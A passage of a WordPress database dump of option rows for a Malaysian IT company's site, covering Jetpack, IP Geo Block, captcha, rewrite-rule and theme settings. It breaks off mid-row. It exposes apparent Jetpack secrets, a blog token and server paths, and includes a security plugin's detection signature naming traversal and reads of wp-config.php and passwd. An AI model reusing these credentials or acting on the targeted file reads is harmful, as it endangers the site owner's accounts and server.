2018\";s:16:\"last_crawled_raw\";s:10:\"1544359145\";s:13:\"response_code\";i:403;}}','no'),(48265,'login_nocaptcha_message_type','notice-error','yes'),(48266,'login_nocaptcha_error','Login NoCaptcha has not been properly configured. <a href=\"options-general.php?page=login-recaptcha/admin.php\">Click here</a> to configure.','yes'),(48268,'login_nocaptcha_key','','yes'),(48269,'login_nocaptcha_secret','','yes'),(48270,'login_nocaptcha_whitelist','','yes'),(61433,'_transient_timeout_jetpack_idc_allowed','1573753682','no'),(61434,'_transient_jetpack_idc_allowed','1','no'),(48308,'jetpack_activated','1','yes'),(48370,'jetpack_log','a:1:{i:0;a:4:{s:4:\"time\";i:1569078634;s:7:\"user_id\";i:1;s:7:\"blog_id\";b:0;s:4:\"code\";s:8:\"register\";}}','no'),(48311,'jetpack_activation_source','a:2:{i:0;s:4:\"list\";i:1;N;}','yes'),(48312,'jetpack_options','a:6:{s:7:\"version\";s:16:\"7.7.1:1569077305\";s:11:\"old_version\";s:16:\"7.7.1:1569077305\";s:28:\"fallback_no_verify_ssl_certs\";i:0;s:9:\"time_diff\";i:0;s:2:\"id\";i:156078236;s:6:\"public\";i:1;}','yes'),(48313,'jetpack_sync_settings_disable','0','yes'),(48320,'jetpack_available_modules','a:1:{s:3:\"7.8\";a:43:{s:8:\"carousel\";s:3:\"1.5\";s:13:\"comment-likes\";s:3:\"5.1\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:9:\"copy-post\";s:3:\"7.0\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:16:\"google-analytics\";s:3:\"4.5\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:11:\"lazy-images\";s:5:\"5.6.0\";s:5:\"likes\";s:3:\"2.2\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"masterbar\";s:3:\"4.8\";s:9:\"minileven\";s:3:\"1.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:10:\"photon-cdn\";s:3:\"6.6\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:3:\"pwa\";s:5:\"5.6.0\";s:13:\"related-posts\";s:3:\"2.9\";s:6:\"search\";s:3:\"5.0\";s:9:\"seo-tools\";s:3:\"4.4\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:8:\"sitemaps\";s:3:\"3.9\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";s:7:\"wordads\";s:5:\"4.5.0\";}}','yes'),(48371,'jetpack_tos_agreed','1','yes'),(48372,'jetpack_secrets','a:1:{s:19:\"jetpack_authorize_1\";a:3:{s:8:\"secret_1\";s:32:\"eOAok58zG9Td1Lze98MlOHGxjCETz7Vj\";s:8:\"secret_2\";s:32:\"eRmGHZNTfab6LKiZ5ljWx7fzHM9nwSCA\";s:3:\"exp\";i:1571994361;}}','no'),(48374,'jetpack_private_options','a:1:{s:10:\"blog_token\";s:65:\"4js&0R0kGD(j6aoR2(^Bi7VaP^xNBzIg.Mc$PMpG8OVfu*bBN%!ONebSoXMAl0d^e\";}','yes'),(48375,'jetpack_last_connect_url_check','1571987151','no'),(48410,'widget_icwp_wpsf_plugin_badge','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(48454,'ip_geo_block_metadata','','yes'),(48455,'ip_geo_block_settings','a:41:{s:7:\"version\";s:8:\"3.0.17.4\";s:9:\"providers\";a:6:{s:11:\"GeoIPLookup\";s:0:\"\";s:9:\"ipinfo.io\";s:0:\"\";s:5:\"ipapi\";s:0:\"\";s:9:\"Ipdata.co\";s:0:\"\";s:7:\"ipstack\";s:0:\"\";s:8:\"IPInfoDB\";s:0:\"\";}s:7:\"comment\";a:2:{s:3:\"pos\";i:0;s:3:\"msg\";s:0:\"\";}s:13:\"matching_rule\";i:0;s:10:\"white_list\";s:2:\"MY\";s:10:\"black_list\";s:2:\"ZZ\";s:7:\"timeout\";i:30;s:13:\"response_code\";i:403;s:15:\"save_statistics\";b:1;s:15:\"clean_uninstall\";b:1;s:8:\"simulate\";b:0;s:10:\"cache_hold\";b:1;s:10:\"cache_time\";i:3600;s:13:\"cache_time_gc\";i:900;s:10:\"request_ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:11:\"login_fails\";i:-1;s:10:\"validation\";a:22:{s:7:\"comment\";b:0;s:5:\"login\";i:1;s:5:\"admin\";i:3;s:4:\"ajax\";i:3;s:6:\"xmlrpc\";i:2;s:5:\"proxy\";s:0:\"\";s:7:\"reclogs\";i:1;s:7:\"postkey\";s:28:\"action,comment,log,pwd,FILES\";s:7:\"maxlogs\";i:500;s:6:\"backup\";N;s:7:\"explogs\";i:7;s:7:\"plugins\";i:0;s:6:\"themes\";i:0;s:6:\"timing\";i:0;s:7:\"recdays\";i:30;s:8:\"includes\";i:3;s:7:\"uploads\";i:3;s:9:\"languages\";i:3;s:6:\"public\";i:0;s:7:\"restapi\";i:3;s:8:\"mimetype\";i:0;s:8:\"metadata\";b:0;}s:6:\"update\";a:3:{s:4:\"auto\";b:1;s:5:\"retry\";i:0;s:5:\"cycle\";i:30;}s:8:\"priority\";a:2:{i:0;i:0;i:1;i:9223372036854775807;}s:9:\"anonymize\";b:1;s:9:\"signature\";s:26:\"../,/wp-config.php,/passwd\";s:9:\"extra_ips\";a:2:{s:10:\"white_list\";s:0:\"\";s:10:\"black_list\";s:0:\"\";}s:7:\"rewrite\";a:5:{s:7:\"plugins\";b:0;s:6:\"themes\";b:0;s:8:\"includes\";b:0;s:7:\"uploads\";b:0;s:9:\"languages\";b:0;}s:7:\"Maxmind\";a:9:{s:9:\"ipv4_path\";s:80:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/maxmind/GeoIP.dat\";s:9:\"ipv6_path\";s:82:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/maxmind/GeoIPv6.dat\";s:9:\"ipv4_last\";i:0;s:9:\"ipv6_last\";i:0;s:7:\"use_asn\";i:0;s:9:\"asn4_path\";N;s:9:\"asn6_path\";N;s:9:\"asn4_last\";i:0;s:9:\"asn6_last\";i:0;}s:11:\"IP2Location\";a:4:{s:9:\"ipv4_path\";s:99:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/ip2location/IP2LOCATION-LITE-DB1.BIN\";s:9:\"ipv6_path\";s:104:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/ip2location/IP2LOCATION-LITE-DB1.IPV6.BIN\";s:9:\"ipv4_last\";i:1572392058;s:9:\"ipv6_last\";i:1572392080;}s:8:\"Geolite2\";a:5:{s:7:\"use_asn\";i:0;s:7:\"ip_path\";s:101:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/maxmind/GeoLite2/GeoLite2-Country.mmdb\";s:7:\"ip_last\";i:1572299006;s:8:\"asn_path\";s:97:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/maxmind/GeoLite2/GeoLite2-ASN.mmdb\";s:8:\"asn_last\";i:1572292442;}s:7:\"api_dir\";s:63:\"/home/norfaiz/public_html/bintara.com.my/wp-content/ip-geo-api/\";s:9:\"exception\";a:8:{s:7:\"plugins\";a:0:{}s:6:\"themes\";a:0:{}s:5:\"admin\";a:0:{}s:6:\"public\";a:4:{i:0;s:13:\"bbp-new-topic\";i:1;s:14:\"bbp-edit-topic\";i:2;s:13:\"bbp-new-reply\";i:3;s:14:\"bbp-edit-reply\";}s:8:\"includes\";a:0:{}s:7:\"uploads\";a:0:{}s:9:\"languages\";a:0:{}s:7:\"restapi\";a:0:{}}s:7:\"api_key\";a:1:{s:9:\"GoogleMap\";s:0:\"\";}s:12:\"login_action\";a:5:{s:5:\"login\";b:1;s:8:\"register\";b:1;s:9:\"resetpass\";b:1;s:12:\"lostpassword\";b:1;s:8:\"postpass\";b:1;}s:12:\"response_msg\";s:39:\"Sorry, your request cannot be accepted.\";s:12:\"redirect_uri\";s:33:\"http://blackhole.webpagetest.org/\";s:12:\"network_wide\";b:0;s:6:\"public\";a:14:{s:13:\"matching_rule\";i:-1;s:10:\"white_list\";s:0:\"\";s:10:\"black_list\";s:2:\"ZZ\";s:11:\"target_rule\";i:0;s:12:\"target_pages\";a:0:{}s:12:\"target_posts\";a:0:{}s:12:\"target_cates\";a:0:{}s:11:\"target_tags\";a:0:{}s:7:\"ua_list\";s:102:\"Google:HOST,bot:HOST,slurp:HOST\nspider:HOST,archive:HOST,*:FEED\nembed.ly:HOST,Twitterbot:US,Facebot:US\";s:7:\"dnslkup\";b:0;s:13:\"response_code\";i:307;s:12:\"redirect_uri\";N;s:12:\"response_msg\";s:39:\"Sorry, your request cannot be accepted.\";s:8:\"behavior\";b:0;}s:8:\"mimetype\";a:3:{s:10:\"white_list\";a:22:{s:12:\"jpg|jpeg|jpe\";s:10:\"image/jpeg\";s:3:\"png\";s:9:\"image/png\";s:3:\"gif\";s:9:\"image/gif\";s:6:\"mov|qt\";s:15:\"video/quicktime\";s:3:\"avi\";s:9:\"video/avi\";s:12:\"mpeg|mpg|mpe\";s:10:\"video/mpeg\";s:8:\"3gp|3gpp\";s:10:\"video/3gpp\";s:8:\"3g2|3gp2\";s:11:\"video/3gpp2\";s:3:\"pdf\";s:15:\"application/pdf\";s:3:\"doc\";s:18:\"application/msword\";s:4:\"docx\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:11:\"pot|pps|ppt\";s:29:\"application/vnd.ms-powerpoint\";s:4:\"pptx\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:3:\"odt\";s:39:\"application/vnd.oasis.opendocument.text\";s:4:\"ppsx\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:15:\"xla|xls|xlt|xlw\";s:24:\"application/vnd.ms-excel\";s:4:\"xlsx\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:11:\"mp3|m4a|m4b\";s:10:\"audio/mpeg\";s:7:\"ogg|oga\";s:9:\"audio/ogg\";s:3:\"wav\";s:9:\"audio/wav\";s:7:\"mp4|m4v\";s:9:\"video/mp4\";s:3:\"ogv\";s:9:\"video/ogg\";}s:10:\"black_list\";s:104:\"asp,aspx,cgi,exe,js,jsp,php,php3,php4,php5,pl,py,pht,phtml,html,htm,shtml,htaccess,sh,svg,gz,zip,rar,tar\";s:10:\"capability\";a:1:{i:0;s:12:\"upload_files\";}}s:11:\"live_update\";a:1:{s:9:\"in_memory\";i:0;}s:8:\"behavior\";a:2:{s:4:\"view\";i:7;s:4:\"time\";i:5;}s:12:\"restrict_api\";b:1;s:10:\"login_link\";a:2:{s:4:\"link\";N;s:4:\"hash\";N;}s:7:\"monitor\";a:2:{s:14:\"updated_option\";b:0;s:18:\"update_site_option\";b:0;}s:8:\"metadata\";a:2:{s:17:\"pre_update_option\";a:4:{i:0;s:7:\"siteurl\";i:1;s:11:\"admin_email\";i:2;s:18:\"users_can_register\";i:3;s:12:\"default_role\";}s:22:\"pre_update_site_option\";a:3:{i:0;s:7:\"siteurl\";i:1;s:11:\"admin_email\";i:2;s:12:\"registration\";}}}','yes'),(48470,'jetpack_ab_connect_banner_green_bar','b','yes'),(56266,'rewrite_rules','a:97:{s:34:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml$\";s:40:\"index.php?xml_sitemap=params=$matches[2]\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.xml\\.gz$\";s:49:\"index.php?xml_sitemap=params=$matches[2];zip=true\";s:35:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html$\";s:50:\"index.php?xml_sitemap=params=$matches[2];html=true\";s:38:\"sitemap(-+([a-zA-Z0-9_-]+))?\\.html.gz$\";s:59:\"index.php?xml_sitemap=params=$matches[2];html=true;zip=true\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:52:\"blog/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:47:\"blog/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:28:\"blog/category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:40:\"blog/category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:22:\"blog/category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:49:\"blog/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:44:\"blog/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:25:\"blog/tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:37:\"blog/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:19:\"blog/tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:50:\"blog/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:45:\"blog/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:26:\"blog/type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:38:\"blog/type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:20:\"blog/type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:16:\".*wp-signup.php$\";s:21:\"index.php?signup=true\";s:18:\".*wp-activate.php$\";s:23:\"index.php?activate=true\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=6&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:52:\"blog/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:47:\"blog/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:28:\"blog/author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:40:\"blog/author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:22:\"blog/author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:74:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:69:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:50:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:62:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:44:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:61:\"blog/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:56:\"blog/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:37:\"blog/([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:49:\"blog/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:31:\"blog/([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:48:\"blog/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:43:\"blog/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:24:\"blog/([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:36:\"blog/([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:18:\"blog/([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:63:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:73:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:93:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:88:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:88:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:69:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:58:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:62:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:82:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:77:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:70:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:77:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:66:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:52:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:62:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:82:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:77:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:77:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:58:\"blog/[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:69:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:56:\"blog/([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:43:\"blog/([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(56279,'_transient_jetpack_assumed_site_creation_date','2013-06-07 10:35:28','yes'),(56280,'jetpack_dismissed_connection_banner','1','yes'),(56264,'wpseo_flush_rewrite','1','yes'),(56321,'_elementor_editor_upgrade_notice_dismissed','1571988701','yes'),(12325,'updraftplus_dismisseddashnotice','1581478147','yes'),(56251,'_elementor_global_css','a:5:{s:4:\"time\";i:1571986873;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:4;s:11:\"Roboto Slab\";}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;b:0;}','yes'),(136,'recently_activated','a:0:{}','yes'),(137,'allowedthemes','a:1:{s:8:\"onepress\";b:1;}','yes'),(138,'theme_mods_onepress','a:62:{s:18:\"custom_css_post_id\";i:1980;s:25:\"onepress_hide_author_link\";i:1;s:23:\"onepress_social_disable\";i:1;s:20:\"onepress_hero_layout\";s:1:\"1\";s:23:\"onepress_hcl1_largetext\";s:59:\"We Get IT <span class=\"js-rotating\">Done | DELIVERED</span>\";s:23:\"onepress_hcl1_btn2_text\";s:8:\"Products\";s:23:\"onepress_hcl1_smalltext\";s:117:\"Multi-brand technology solutions provider to business, government, education and healthcare organisations in Malaysia\";s:20:\"onepress_hero_images\";a:1:{i:0;a:1:{s:5:\"image\";a:2:{s:3:\"url\";s:63:\"https://bintara.com.my/wp-content/uploads/2018/12/thumbnail.jpg\";s:2:\"id\";i:1260;}}}s:21:\"onepress_header_width\";s:9:\"contained\";s:22:\"onepress_slider_slides\";a:2:{i:0;a:10:{s:5:\"media\";a:2:{s:3:\"url\";s:94:\"https://bintara.com.my/wp-content/uploads/2018/12/d5cc3c08eaee8641b7ee278fc349b06834e6cef7.jpg\";s:2:\"id\";i:1263;}s:5:\"title\";s:0:\"\";s:7:\"content\";s:23:\"<br data-mce-bogus=\"1\">\";s:9:\"alignment\";s:6:\"center\";s:11:\"btn_1_label\";s:9:\"Click Me!\";s:10:\"btn_1_link\";s:1:\"#\";s:12:\"btn_1_button\";s:17:\"btn-theme-primary\";s:11:\"btn_2_label\";s:6:\"Button\";s:10:\"btn_2_link\";s:1:\"#\";s:12:\"btn_2_button\";s:21:\"btn-secondary-outline\";}i:1;a:10:{s:5:\"media\";a:2:{s:3:\"url\";s:83:\"https://bintara.com.my/wp-content/plugins/onepress-plus//assets/images/slider-2.jpg\";s:2:\"id\";s:0:\"\";}s:5:\"title\";s:15:\"Slider Title #2\";s:7:\"content\";s:156:\"Morbi tempus porta nunc pharetra quisque ligula imperdiet posuere<br />vitae felis proin sagittis leo ac tellus blandit sollicitudin quisque vitae placerat.\";s:9:\"alignment\";s:6:\"center\";s:11:\"btn_1_label\";s:6:\"Button\";s:10:\"btn_1_link\";s:1:\"#\";s:12:\"btn_1_button\";s:17:\"btn-theme-primary\";s:11:\"btn_2_label\";s:0:\"\";s:10:\"btn_2_link\";s:1:\"#\";s:12:\"btn_2_button\";s:21:\"btn-secondary-outline\";}}s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:22;}s:25:\"onepress_transparent_logo\";s:71:\"https://bintara.com.my/wp-content/uploads/2018/12/Logo-Bintara-Asal.png\";s:11:\"custom_logo\";i:1273;s:23:\"onepress_hide_sitetitle\";i:1;s:21:\"onepress_hide_tagline\";i:1;s:20:\"onepress_logo_height\";s:2:\"75\";s:30:\"onepress_section_order_styling\";a:16:{i:0;a:23:{s:6:\"add_by\";s:0:\"\";s:12:\"__visibility\";s:0:\"\";s:5:\"title\";s:6:\"Slider\";s:10:\"section_id\";s:6:\"slider\";s:17:\"section_page_slug\";s:10:\"contact-us\";s:8:\"subtitle\";s:0:\"\";s:7:\"bg_type\";s:5:\"color\";s:8:\"bg_color\";s:0:\"\";s:8:\"bg_image\";a:2:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"